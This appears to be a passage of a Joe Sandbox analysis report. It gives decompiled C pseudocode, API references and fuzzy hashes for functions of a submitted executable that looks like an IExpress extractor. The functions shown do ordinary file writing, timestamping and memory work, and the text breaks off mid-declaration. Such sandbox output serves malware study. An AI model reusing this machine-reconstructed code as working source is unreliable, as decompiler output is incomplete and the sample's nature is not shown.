                                                                                                                                                                                                          0x00864dbd
                                                                                                                                                                                                          0x00864d2a
                                                                                                                                                                                                          0x00864d2a
                                                                                                                                                                                                          0x00864d2d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864d2d
                                                                                                                                                                                                          0x00864cf8
                                                                                                                                                                                                          0x00864cfd
                                                                                                                                                                                                          0x00864d02
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00864DB5
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00864DDD
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFileItemText
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                          • API String ID: 3625706803-2312194364
                                                                                                                                                                                                          • Opcode ID: 98607b36fe3a9808a1709c7d77dc3e2ba59b4d0063c817711d1b6d00c7010c44
                                                                                                                                                                                                          • Instruction ID: 22769ecb6bf5fae12762fbadfd885e95879bf70f343e22c2994e5eaa89e02ea8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98607b36fe3a9808a1709c7d77dc3e2ba59b4d0063c817711d1b6d00c7010c44
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D415936A001058BCB259F38DD44AFD73A5FB46710F166668D882D7682DF32DE4AC750
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00864C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                          				struct _FILETIME _v12;
                                                                                                                                                                                                          				struct _FILETIME _v20;
                                                                                                                                                                                                          				FILETIME* _t14;
                                                                                                                                                                                                          				int _t15;
                                                                                                                                                                                                          				signed int _t21;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t21 = __ecx * 0x18;
                                                                                                                                                                                                          				if( *((intOrPtr*)(_t21 + 0x868d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t14 =  &_v12;
                                                                                                                                                                                                          					_t15 = SetFileTime( *(_t21 + 0x868d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                          					if(_t15 == 0) {
                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}









                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DosDateTimeToFileTime.KERNEL32 ref: 00864C54
                                                                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00864C66
                                                                                                                                                                                                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 00864C7E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Time$File$DateLocal
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2071732420-0
                                                                                                                                                                                                          • Opcode ID: 5235b526bb0ac2816d1b3277e84ffdd5a8fa71e8b8eceb5e7a2628f5d6b50907
                                                                                                                                                                                                          • Instruction ID: 19da8557ee60edb34baeda90510247d188ac68b3d9b80f214c337ccb64714102
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5235b526bb0ac2816d1b3277e84ffdd5a8fa71e8b8eceb5e7a2628f5d6b50907
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62F0907260120CAFDB24DFB4CC48DBF7BACFB04240B46152BE916D2150EA74D914CBB1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                          			E0086487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                          				void* _t7;
                                                                                                                                                                                                          				CHAR* _t11;
                                                                                                                                                                                                          				long _t18;
                                                                                                                                                                                                          				long _t23;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t11 = __ecx;
                                                                                                                                                                                                          				asm("sbb edi, edi");
                                                                                                                                                                                                          				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                          				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                          					asm("sbb esi, esi");
                                                                                                                                                                                                          					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                          						asm("sbb esi, esi");
                                                                                                                                                                                                          						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t23 = 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                          				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                          					return _t7;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					E0086490C(_t11);
                                                                                                                                                                                                          					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}








                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00864A23,?,00864F67,*MEMCAB,00008000,00000180), ref: 008648DE
                                                                                                                                                                                                          • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00864F67,*MEMCAB,00008000,00000180), ref: 00864902
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                          • Opcode ID: 2e6327df9ecb71321cc68988ecf675ea3d1c3e1821ee3adffa3d320c7e20bbb5
                                                                                                                                                                                                          • Instruction ID: 8d3fb73430f976bde3c8cdf3bf316b24f64389a441c08ee1416c98691f840351
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e6327df9ecb71321cc68988ecf675ea3d1c3e1821ee3adffa3d320c7e20bbb5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78016DA3E1157426F32841294C88FBB591CEBD6B34F1B2334FDEAE71D2D5644C0482E0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                          			E00864AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                          				signed int _t9;
                                                                                                                                                                                                          				int _t12;
                                                                                                                                                                                                          				signed int _t14;
                                                                                                                                                                                                          				signed int _t15;
                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                          				struct HWND__* _t21;
                                                                                                                                                                                                          				signed int _t24;
                                                                                                                                                                                                          				signed int _t25;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t20 =  *0x86858c; // 0x274
                                                                                                                                                                                                          				_t9 = E00863680(_t20);
                                                                                                                                                                                                          				if( *0x8691d8 == 0) {
                                                                                                                                                                                                          					_push(_t24);
                                                                                                                                                                                                          					_t12 = WriteFile( *(0x868d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                          					if(_t12 != 0) {
                                                                                                                                                                                                          						_t25 = _a12;
                                                                                                                                                                                                          						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                          							_t14 =  *0x869400; // 0x89475
                                                                                                                                                                                                          							_t15 = _t14 + _t25;
                                                                                                                                                                                                          							 *0x869400 = _t15;
                                                                                                                                                                                                          							if( *0x868184 != 0) {
                                                                                                                                                                                                          								_t21 =  *0x868584; // 0x0
                                                                                                                                                                                                          								if(_t21 != 0) {
                                                                                                                                                                                                          									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x8693f8, 0);
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					return _t25;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					return _t9 | 0xffffffff;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}












                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00863680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0086369F
                                                                                                                                                                                                            • Part of subcall function 00863680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008636B2
                                                                                                                                                                                                            • Part of subcall function 00863680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008636DA
                                                                                                                                                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00864B05
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1084409-0
                                                                                                                                                                                                          • Opcode ID: b655c3868383783b98035234ba7cd5859a60c20a47deac80055a4e9e798d9cf3
                                                                                                                                                                                                          • Instruction ID: bee5f29e885050f6f1aacb998b1ae4d0fb2b2d232416029d0dfd5510cc2c8e9b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b655c3868383783b98035234ba7cd5859a60c20a47deac80055a4e9e798d9cf3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA019271200215EBD7198F98DC05BAA775DF744735F16A225F939DB2E0CBB0D811CB50
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E0086658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                          				intOrPtr _t4;
                                                                                                                                                                                                          				char* _t6;
                                                                                                                                                                                                          				char* _t8;
                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                          				void* _t12;
                                                                                                                                                                                                          				char* _t16;
                                                                                                                                                                                                          				intOrPtr* _t17;
                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                          				char* _t19;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t16 = __ecx;
                                                                                                                                                                                                          				_t10 = __edx;
                                                                                                                                                                                                          				_t17 = __ecx;
                                                                                                                                                                                                          				_t1 = _t17 + 1; // 0x868b3f
                                                                                                                                                                                                          				_t12 = _t1;
                                                                                                                                                                                                          				do {
                                                                                                                                                                                                          					_t4 =  *_t17;
                                                                                                                                                                                                          					_t17 = _t17 + 1;
                                                                                                                                                                                                          				} while (_t4 != 0);
                                                                                                                                                                                                          				_t18 = _t17 - _t12;
                                                                                                                                                                                                          				_t2 = _t18 + 1; // 0x868b40
                                                                                                                                                                                                          				if(_t2 < __edx) {
                                                                                                                                                                                                          					_t19 = _t18 + __ecx;
                                                                                                                                                                                                          					if(_t19 > __ecx) {
                                                                                                                                                                                                          						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                          						if( *_t8 != 0x5c) {
                                                                                                                                                                                                          							 *_t19 = 0x5c;
                                                                                                                                                                                                          							_t19 =  &(_t19[1]);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t6 = _a4;
                                                                                                                                                                                                          					 *_t19 = 0;
                                                                                                                                                                                                          					while( *_t6 == 0x20) {
                                                                                                                                                                                                          						_t6 = _t6 + 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					return E008616B3(_t16, _t10, _t6);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return 0x8007007a;
                                                                                                                                                                                                          			}













                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CharPrevA.USER32(00868B3E,00868B3F,00000001,00868B3E,-00000003,?,008660EC,00861140,?), ref: 008665BA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharPrev
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 122130370-0
                                                                                                                                                                                                          • Opcode ID: 036619c51bbae4b118d7c10c0190bd30f63a0ec528f7d157b467c2554b852f5f
                                                                                                                                                                                                          • Instruction ID: 940ee27e042bd1e56af9c0dcf4fa49704de3ab965b70835f30f7145e701e7ed5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 036619c51bbae4b118d7c10c0190bd30f63a0ec528f7d157b467c2554b852f5f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AF04C326042D09BD731491DD88DB76BFDEFB86350F2A016EE8DBC3205EA658C5583A4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                          			E0086621E() {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				signed int _t5;
                                                                                                                                                                                                          				void* _t9;
                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                          				void* _t19;
                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                          				signed int _t21;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t5 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                          				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                          					0x4f0 = 2;
                                                                                                                                                                                                          					_t9 = E0086597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					E008644B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                          					 *0x869124 = E00866285();
                                                                                                                                                                                                          					_t9 = 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                          			}












                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0086623F
                                                                                                                                                                                                            • Part of subcall function 008644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                            • Part of subcall function 008644B9: MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                            • Part of subcall function 00866285: GetLastError.KERNEL32(00865BBC), ref: 00866285
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 381621628-0
                                                                                                                                                                                                          • Opcode ID: a49a7f280b31c715ea219f973d335aa7a159102400334fb2fc55f9b3aef23b22
                                                                                                                                                                                                          • Instruction ID: 005c5d7b99c4c6f778b8a37a9df928bdcab518bf22371b70bb5a7632580473c4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a49a7f280b31c715ea219f973d335aa7a159102400334fb2fc55f9b3aef23b22
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7F0B470600208ABD750EB789D02FBE37ACFB54700F420469A986D6181EDB499548651
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00864B60(signed int _a4) {
                                                                                                                                                                                                          				signed int _t9;
                                                                                                                                                                                                          				signed int _t15;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t15 = _a4 * 0x18;
                                                                                                                                                                                                          				if( *((intOrPtr*)(_t15 + 0x868d64)) != 1) {
                                                                                                                                                                                                          					_t9 = FindCloseChangeNotification( *(_t15 + 0x868d74)); // executed
                                                                                                                                                                                                          					if(_t9 == 0) {
                                                                                                                                                                                                          						return _t9 | 0xffffffff;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *((intOrPtr*)(_t15 + 0x868d60)) = 1;
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				 *((intOrPtr*)(_t15 + 0x868d60)) = 1;
                                                                                                                                                                                                          				 *((intOrPtr*)(_t15 + 0x868d68)) = 0;
                                                                                                                                                                                                          				 *((intOrPtr*)(_t15 + 0x868d70)) = 0;
                                                                                                                                                                                                          				 *((intOrPtr*)(_t15 + 0x868d6c)) = 0;
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}






                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00864FA1,00000000), ref: 00864B98
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2591292051-0
                                                                                                                                                                                                          • Opcode ID: 9478063750c62dc36f76287f434d540c2149408d6b00f58ccccda5848e057e43
                                                                                                                                                                                                          • Instruction ID: cb925a06806331b21171753e96d666b8d1bc28a0644f9e1f003a63cb2779ddf0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9478063750c62dc36f76287f434d540c2149408d6b00f58ccccda5848e057e43
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44F01231540B08DE47718F79CC00A56BBE5FA953B07121B2EE56ED3290DB70A481CBA0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E008666AE(CHAR* __ecx) {
                                                                                                                                                                                                          				unsigned int _t1;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                          				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                          					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}





                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(?,00864777,?,00864E38,?), ref: 008666B1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                          • Opcode ID: 32ede9ee110bf041dc9b1880381c2e405e94e3f189a20ade896d8e6e8971e56d
                                                                                                                                                                                                          • Instruction ID: 4d8b1fcb9036e339c39a00647b46987f1a5e3c820f71227385ad8df5a77186ab
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32ede9ee110bf041dc9b1880381c2e405e94e3f189a20ade896d8e6e8971e56d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BDB0927A226880826A240631BC295563842F7E123A7EA2B90F132D01E0DA7EC866D405
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00864CA0(long _a4) {
	void* _t2;

	_t2 = GlobalAlloc(0, _a4); // executed
	return _t2;
}





APIs
• GlobalAlloc.KERNELBASE(00000000,?), ref: 00864CAA
Memory Dump Source
• Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
• Opcode ID: ec44afd1d685f9329c203e8a9d56c7a01d41ad0b4a8a5c7de5b73a96b93200e7
• Instruction ID: d7d6fd2aecfe5ae812dd69256e85fbf2de8b12355f81e7dcd7a6372a2f6d172a
• Opcode Fuzzy Hash: ec44afd1d685f9329c203e8a9d56c7a01d41ad0b4a8a5c7de5b73a96b93200e7
• Instruction Fuzzy Hash: BDB0123204820CF7CF001FC2EC09F853F5DF7C4761F150000F60C490508AB294108A97
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00864CC0(void* _a4) {
	void* _t2;

	_t2 = GlobalFree(_a4); // executed
	return _t2;
}





APIs
Memory Dump Source
• Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
Similarity
• API ID: FreeGlobal
• String ID:
• API String ID: 2979337801-0
• Opcode ID: ade3d1eb91a06fe9dc79e793bab600f1e338ae88bce8263e605bb6739812d81e
• Instruction ID: 4261d49c11a57dd0a5ff21761954c2aa0b355ce3ca5f373b5609fe2ab8ef4e03
• Opcode Fuzzy Hash: ade3d1eb91a06fe9dc79e793bab600f1e338ae88bce8263e605bb6739812d81e
• Instruction Fuzzy Hash: 05B0123100010CF78F001B42EC088453F5DE6C02607010010F50C450218B7398118986
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
E00865C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
	signed int _v8;
	signed int _v12;
	CHAR* _v265;
	char _v266;
	char _v267;
	char _v268;
	CHAR* _v272;
	char _v276;
	signed int _v296;
	char _v556;
	signed int _t61;
	int _t63;
	char _t67;
	CHAR* _t69;
	signed int _t71;
	void* _t75;
	char _t79;
	void* _t83;
	void* _t85;
	void* _t87;
	intOrPtr _t88;
	void* _t100;
	intOrPtr _t101;
	CHAR* _t104;
	intOrPtr _t105;
	void* _t111;
	void* _t115;
	CHAR* _t118;
	void* _t119;
	void* _t127;
	CHAR* _t129;
	void* _t132;
	void* _t142;
	signed int _t143;
	CHAR* _t144;
	void* _t145;
	void* _t146;
	void* _t147;
	void* _t149;
	char _t155;
	void* _t157;
	void* _t162;
	void* _t163;
	char _t167;
	char _t170;
	CHAR* _t173;
	void* _t177;
	intOrPtr* _t183;
	intOrPtr* _t192;
	CHAR* _t199;
	void* _t200;
	CHAR* _t201;
	void* _t205;
	void* _t206;
	int _t209;
	void* _t210;
	void* _t212;
	void* _t213;
	CHAR* _t218;
